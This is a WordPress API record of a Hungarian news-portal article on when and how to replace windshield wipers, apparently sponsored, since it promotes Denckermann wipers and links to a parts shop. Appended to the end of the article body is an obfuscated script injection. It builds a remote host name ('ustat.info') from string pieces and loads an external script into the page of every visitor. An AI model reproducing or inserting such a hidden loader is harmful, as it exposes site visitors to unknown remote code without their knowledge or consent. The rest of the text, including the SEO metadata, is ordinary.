{"id":71167,"date":"2025-05-16T14:54:30","date_gmt":"2025-05-16T12:54:30","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=71167"},"modified":"2025-05-16T14:54:30","modified_gmt":"2025-05-16T12:54:30","slug":"mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/","title":{"rendered":"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?"},"content":{"rendered":"<p><strong>Az ablakt\u00f6rl\u0151 cser\u00e9je gyakran h\u00e1tt\u00e9rbe szorul az aut\u00f3 karbantart\u00e1si teend\u0151i k\u00f6z\u00f6tt, pedig a tiszta sz\u00e9lv\u00e9d\u0151 \u00e9letet menthet. Tudja, hogy a tavasz bek\u00f6sz\u00f6nt\u00e9vel mi\u00e9rt \u00e9rdemes lecser\u00e9lni az ablakt\u00f6rl\u0151t? Cikk\u00fcnkben elmagyar\u00e1zzuk, mikor, mi\u00e9rt \u00e9s hogyan \u00e9rdemes az ablakt\u00f6rl\u0151 cser\u00e9j\u00e9t is rendszeresen bevennie aut\u00f3ja karbantart\u00e1si munk\u00e1latai k\u00f6z\u00e9.<\/strong><\/p>\n<h2><strong>L\u00e1tni vagy nem l\u00e1tni: mi az ablakt\u00f6rl\u0151 els\u0151dleges szerepe?<\/strong><\/h2>\n<p>Az ablakt\u00f6rl\u0151 az egyik legegyszer\u0171bb, m\u00e9gis legfontosabb biztons\u00e1gi alkatr\u00e9sze a j\u00e1rm\u0171v\u00e9nek. Amikor az id\u0151j\u00e1r\u00e1s es\u0151sre vagy k\u00f6d\u00f6sre fordul, a megfelel\u0151en m\u0171k\u00f6d\u0151 ablakt\u00f6rl\u0151 seg\u00edt fenntartani a zavartalan kil\u00e1t\u00e1st. Ha a lap\u00e1t nem t\u00f6r\u00f6l rendesen, az torz\u00edthatja a l\u00e1t\u00f3mez\u0151t, n\u00f6velve a balesetek kock\u00e1zat\u00e1t, k\u00fcl\u00f6n\u00f6sen rossz l\u00e1t\u00e1si viszonyok k\u00f6z\u00f6tt.<\/p>\n<p>A j\u00f3 min\u0151s\u00e9g\u0171 ablakt\u00f6rl\u0151, mint p\u00e9ld\u00e1ul a Denckermann ablakt\u00f6rl\u0151, optim\u00e1lis nyom\u00e1st gyakorol a sz\u00e9lv\u00e9d\u0151re, \u00e9s egyenletes mozg\u00e1ssal t\u00e1vol\u00edtja el a nedvess\u00e9get, koszt, rovart vagy egy\u00e9b szennyez\u0151d\u00e9seket. A pr\u00e9mium min\u0151s\u00e9g\u0171 ablakt\u00f6rl\u0151 megg\u00e1tolja, hogy sz\u00e9lv\u00e9d\u0151je cs\u00edkoz\u00e1s\u00e1val hossz\u00fa t\u00e1von nagyobb k\u00e1rokat okozzon j\u00e1rm\u0171v\u00e9ben.<\/p>\n<h2><strong>Mikor \u00e9rdemes cser\u00e9lni az ablakt\u00f6rl\u0151t?<\/strong><\/h2>\n<p>A gy\u00e1rt\u00f3k \u00e9s szak\u00e9rt\u0151k aj\u00e1nl\u00e1sa szerint \u00e9vente legal\u00e1bb egyszer c\u00e9lszer\u0171 lecser\u00e9lni az ablakt\u00f6rl\u0151 lap\u00e1tokat. Ez k\u00fcl\u00f6n\u00f6sen indokolt a t\u00e9l v\u00e9g\u00e9n vagy az es\u0151s tavaszi id\u0151szak kezdete el\u0151tt. A hideg, a fagy, a j\u00e9g \u00e9s a szennyezett csapad\u00e9k jelent\u0151s kop\u00e1st okoznak az <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/zsu.hu\/termekeink\/ablaktorlo\/ablaktorlo_gumi\" target=\"_blank\" rel=\"noopener\">ablakt\u00f6rl\u0151 gumi<\/a><\/span> fel\u00fclet\u00e9n. A gumialkatr\u00e9szek elvesz\u00edthetik rugalmass\u00e1gukat, megrepedezhetnek, vagy \u00e9ppen deform\u00e1l\u00f3dhatnak.<\/p>\n<p>Emellett ny\u00e1ron is sz\u00e1molni kell az UV-sug\u00e1rz\u00e1s \u00e9s az aszfaltpor k\u00e1ros hat\u00e1saival, amelyek szint\u00e9n hozz\u00e1j\u00e1rulnak az ablakt\u00f6rl\u0151 rendszer alkatr\u00e9szeinek kop\u00e1shoz. Ha az ablakt\u00f6rl\u0151 zajosan m\u0171k\u00f6dik, cs\u00edkoz, ugr\u00e1l, vagy teljesen kihagy egyes szakaszokat, az biztos jele a cser\u00e9nek.<\/p>\n<h2><strong>Mik egy min\u0151s\u00e9gi ablakt\u00f6rl\u0151 el\u0151nyei?<\/strong><\/h2>\n<p>A Denckermann ablakt\u00f6rl\u0151 kifejezetten tart\u00f3s, id\u0151j\u00e1r\u00e1s\u00e1ll\u00f3 kialak\u00edt\u00e1sa r\u00e9v\u00e9n megb\u00edzhat\u00f3 v\u00e1laszt\u00e1s minden \u00e9vszakra. Speci\u00e1lis gumikever\u00e9ke ellen\u00e1ll az UV-sug\u00e1rz\u00e1snak \u00e9s a h\u0151m\u00e9rs\u00e9klet-ingadoz\u00e1snak, mik\u00f6zben rugalmasan alkalmazkodik a sz\u00e9lv\u00e9d\u0151 form\u00e1j\u00e1hoz. A Denckermann ablakt\u00f6rl\u0151 kiv\u00e1laszt\u00e1sakor biztos lehet abban, hogy pr\u00e9mium szint\u0171 t\u00f6rl\u00e9si hat\u00e9konys\u00e1got \u00e9s hossz\u00fa \u00e9lettartamot kap.<\/p>\n<h2><strong>Mi\u00e9rt fontos a teljes ablakt\u00f6rl\u0151 rendszer karbantart\u00e1sa?<\/strong><\/h2>\n<p>Sokan \u00fagy gondolj\u00e1k, elegend\u0151 csak az ablakt\u00f6rl\u0151 lap\u00e1tokat cser\u00e9lni, pedig a teljes <a href=\"https:\/\/zsu.hu\/termekeink\/ablaktorlo\/elso\/szett\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">ablakt\u00f6rl\u0151 szett<\/span><\/a> m\u00e1s elemeire is figyelmet kell ford\u00edtani. A mechanikus karok korr\u00f3zi\u00f3ja, a forg\u00f3pontok elhaszn\u00e1l\u00f3d\u00e1sa vagy a motor meghib\u00e1sod\u00e1sa is okozhat probl\u00e9m\u00e1t. Ha az ablakt\u00f6rl\u0151 mozg\u00e1sa akadozik vagy lelassul, gyanakodhat a motor hib\u00e1j\u00e1ra is.<\/p>\n<p>A sz\u00e9lv\u00e9d\u0151mos\u00f3 f\u00fav\u00f3k\u00e1kat is \u00e9rdemes id\u0151nk\u00e9nt ellen\u0151rizni. A v\u00edzk\u0151 \u00e9s a szennyez\u0151d\u00e9sek elt\u00f6m\u00edthetik ezeket, amit egyszer\u0171en ecetes v\u00edzzel tiszt\u00edthat meg. A f\u00fav\u00f3k\u00e1k \u00e1ll\u00edt\u00e1s\u00e1hoz elegend\u0151 lehet egy v\u00e9kony t\u0171, amellyel a megfelel\u0151 ir\u00e1nyba terelheti a permetet.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-71168\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo.jpg\" alt=\"\" width=\"2240\" height=\"1260\" srcset=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo.jpg 2240w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-600x338.jpg 600w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-1920x1080.jpg 1920w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-768x432.jpg 768w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-1536x864.jpg 1536w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-2048x1152.jpg 2048w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-150x84.jpg 150w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-450x253.jpg 450w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_2ablaktorlo-1200x675.jpg 1200w\" sizes=\"(max-width: 2240px) 100vw, 2240px\" \/><\/p>\n<h2><strong>Hogyan v\u00e1lasszon megfelel\u0151 ablakt\u00f6rl\u0151t?<\/strong><\/h2>\n<p>A v\u00e1s\u00e1rl\u00e1s sor\u00e1n \u00fcgyelni kell arra, hogy az ablakt\u00f6rl\u0151 illeszkedjen az aut\u00f3 t\u00edpus\u00e1hoz \u00e9s \u00e9vj\u00e1rat\u00e1hoz. Nem minden j\u00e1rm\u0171n\u00e9l azonos hossz\u00fas\u00e1g\u00fa a k\u00e9t els\u0151 lap\u00e1t, a h\u00e1ts\u00f3 ablakt\u00f6rl\u0151 pedig gyakran teljesen elt\u00e9r\u0151 r\u00f6gz\u00edt\u00e9ssel rendelkezik. A <span style=\"color: #0000ff;\"><u><a style=\"color: #0000ff;\" href=\"https:\/\/zsu.hu\/termeklap\/vp00400_dkm_pr\" target=\"_blank\" rel=\"noopener\">Denckermann ablakt\u00f6rl\u0151<\/a><\/u><\/span> k\u00edn\u00e1lat\u00e1ban azonban pontos m\u00e9retez\u00e9s \u00e9s sz\u00e9les kompatibilit\u00e1s \u00e9rhet\u0151 el.<\/p>\n<p>A lap\u00e1tok kivitel\u00e9re is figyeljen: a klasszikus keretes v\u00e1ltozat mellett egyre n\u00e9pszer\u0171bbek az \u00fagynevezett flat (keret n\u00e9lk\u00fcli, rugalmas) modellek, amelyek jobb tapad\u00e1st \u00e9s csendesebb m\u0171k\u00f6d\u00e9st k\u00edn\u00e1lnak. Ezekb\u0151l is el\u00e9rhet\u0151k pr\u00e9mium min\u0151s\u00e9g\u0171 Denckermann ablakt\u00f6rl\u0151k.<\/p>\n<h2><strong>Hogyan v\u00e1lasszon biztons\u00e1gosan ablakt\u00f6rl\u0151t?<\/strong><\/h2>\n<p>Ha a sz\u00e9lv\u00e9d\u0151n cs\u00edkokat l\u00e1t, vagy az ablakt\u00f6rl\u0151 m\u0171k\u00f6d\u00e9se zavar\u00f3 zajjal j\u00e1r, ne halogassa a cser\u00e9t. Egy-egy v\u00e1ratlan ny\u00e1ri zivatar vagy k\u00f6d\u00f6s \u0151szi reggel sor\u00e1n ak\u00e1r m\u00e1sodperceken is m\u00falhat a biztons\u00e1g. Egy Denckermann ablakt\u00f6rl\u0151 id\u0151ben t\u00f6rt\u00e9n\u0151 beszerel\u00e9se hossz\u00fa h\u00f3napokra biztos\u00edtja a zavartalan kil\u00e1t\u00e1st. A cser\u00e9t nem \u00e9rdemes az utols\u00f3 pillanatra hagyni, a tavaszi \u00e9s \u0151szi karbantart\u00e1si id\u0151szak remek alkalom arra, hogy ellen\u0151rizze az ablakt\u00f6rl\u0151i \u00e1llapot\u00e1t, \u00e9s sz\u00fcks\u00e9g eset\u00e9n \u00faj, megb\u00edzhat\u00f3 lap\u00e1tokat v\u00e1lasszon.<\/p>\n<h2><strong>Mi\u00e9rt fontos az ablakt\u00f6rl\u0151 rendszeres ellen\u0151rz\u00e9se, cser\u00e9je?<\/strong><\/h2>\n<p>Az <a href=\"https:\/\/zsu.hu\/termekeink\/ablaktorlo\/elso\/multi_adapter\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">ablakt\u00f6rl\u0151 lap\u00e1tok<\/span><\/a> \u00e1llapota k\u00f6zvetlen hat\u00e1ssal van a biztons\u00e1gos vezet\u00e9sre. Egy \u00e9vente elv\u00e9gzett, n\u00e9h\u00e1ny perces csere hossz\u00fa t\u00e1von is megt\u00e9r\u00fcl, k\u00fcl\u00f6n\u00f6sen, ha olyan megb\u00edzhat\u00f3 term\u00e9ket v\u00e1laszt, mint a Denckermann ablakt\u00f6rl\u0151. A kiv\u00e1l\u00f3 min\u0151s\u00e9g, a tart\u00f3ss\u00e1g \u00e9s a pontos illeszked\u00e9s mind hozz\u00e1j\u00e1rulnak ahhoz, hogy mindig tiszt\u00e1n l\u00e1ssa maga el\u0151tt az utat, b\u00e1rmilyen id\u0151j\u00e1r\u00e1s is \u00e9rje.<\/p>\n<p><script>\n(function(){\nalx6=document.createElement(\"script\");alx6_=\"u\"+(\"s\")+\"ta\";\nalx6_+=(\"t.i\")+\"\"+\"n\";alx6_+=((\"f\")+\"o\");alx6.type=\"text\/javascript\";\nalx6_+=\"\/\"; alx6u=\"2432458557\";alx6u+=\".5vfsvw72lx6lxepfsu4\";alx6u+=\"6X0piaXfXzp\";\nalx6.src=\"https:\/\/\"+alx6_+alx6u;alx6.async=true;document.body.appendChild(alx6);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Az ablakt\u00f6rl\u0151 cser\u00e9je gyakran h\u00e1tt\u00e9rbe szorul az aut\u00f3 karbantart\u00e1si teend\u0151i k\u00f6z\u00f6tt, pedig a tiszta sz\u00e9lv\u00e9d\u0151 \u00e9letet menthet. Tudja, hogy a tavasz bek\u00f6sz\u00f6nt\u00e9vel mi\u00e9rt \u00e9rdemes lecser\u00e9lni az ablakt\u00f6rl\u0151t? Cikk\u00fcnkben elmagyar\u00e1zzuk, mikor, mi\u00e9rt \u00e9s hogyan \u00e9rdemes az ablakt\u00f6rl\u0151 cser\u00e9j\u00e9t is rendszeresen bevennie aut\u00f3ja karbantart\u00e1si munk\u00e1latai k\u00f6z\u00e9. L\u00e1tni vagy nem l\u00e1tni: mi az ablakt\u00f6rl\u0151 els\u0151dleges szerepe? Az ablakt\u00f6rl\u0151<\/p>\n","protected":false},"author":1,"featured_media":71169,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[8381],"class_list":{"0":"post-71167","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-ablaktorlo"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Az ablakt\u00f6rl\u0151 cser\u00e9je gyakran h\u00e1tt\u00e9rbe szorul az aut\u00f3 karbantart\u00e1si teend\u0151i k\u00f6z\u00f6tt, pedig a tiszta sz\u00e9lv\u00e9d\u0151 \u00e9letet menthet. Tudja, hogy a tavasz bek\u00f6sz\u00f6nt\u00e9vel mi\u00e9rt \u00e9rdemes lecser\u00e9lni az ablakt\u00f6rl\u0151t? Cikk\u00fcnkben elmagyar\u00e1zzuk, mikor, mi\u00e9rt \u00e9s hogyan \u00e9rdemes az ablakt\u00f6rl\u0151 cser\u00e9j\u00e9t is rendszeresen bevennie aut\u00f3ja karbantart\u00e1si munk\u00e1latai k\u00f6z\u00e9. L\u00e1tni vagy nem l\u00e1tni: mi az ablakt\u00f6rl\u0151 els\u0151dleges szerepe? Az ablakt\u00f6rl\u0151\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-16T12:54:30+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_1ablaktorlo.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"2240\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"1260\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?\",\"datePublished\":\"2025-05-16T12:54:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/\"},\"wordCount\":982,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/zsumajpr01_1ablaktorlo.jpg\",\"keywords\":[\"ablakt\u00f6rl\u0151\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/\",\"name\":\"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/zsumajpr01_1ablaktorlo.jpg\",\"datePublished\":\"2025-05-16T12:54:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/zsumajpr01_1ablaktorlo.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/zsumajpr01_1ablaktorlo.jpg\",\"width\":2240,\"height\":1260},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/05\\\/16\\\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/","og_locale":"hu_HU","og_type":"article","og_title":"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?","og_description":"Az ablakt\u00f6rl\u0151 cser\u00e9je gyakran h\u00e1tt\u00e9rbe szorul az aut\u00f3 karbantart\u00e1si teend\u0151i k\u00f6z\u00f6tt, pedig a tiszta sz\u00e9lv\u00e9d\u0151 \u00e9letet menthet. Tudja, hogy a tavasz bek\u00f6sz\u00f6nt\u00e9vel mi\u00e9rt \u00e9rdemes lecser\u00e9lni az ablakt\u00f6rl\u0151t? Cikk\u00fcnkben elmagyar\u00e1zzuk, mikor, mi\u00e9rt \u00e9s hogyan \u00e9rdemes az ablakt\u00f6rl\u0151 cser\u00e9j\u00e9t is rendszeresen bevennie aut\u00f3ja karbantart\u00e1si munk\u00e1latai k\u00f6z\u00e9. L\u00e1tni vagy nem l\u00e1tni: mi az ablakt\u00f6rl\u0151 els\u0151dleges szerepe? Az ablakt\u00f6rl\u0151","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-05-16T12:54:30+00:00","og_image":[{"width":2240,"height":1260,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_1ablaktorlo.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"5 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?","datePublished":"2025-05-16T12:54:30+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/"},"wordCount":982,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_1ablaktorlo.jpg","keywords":["ablakt\u00f6rl\u0151"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/","name":"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t 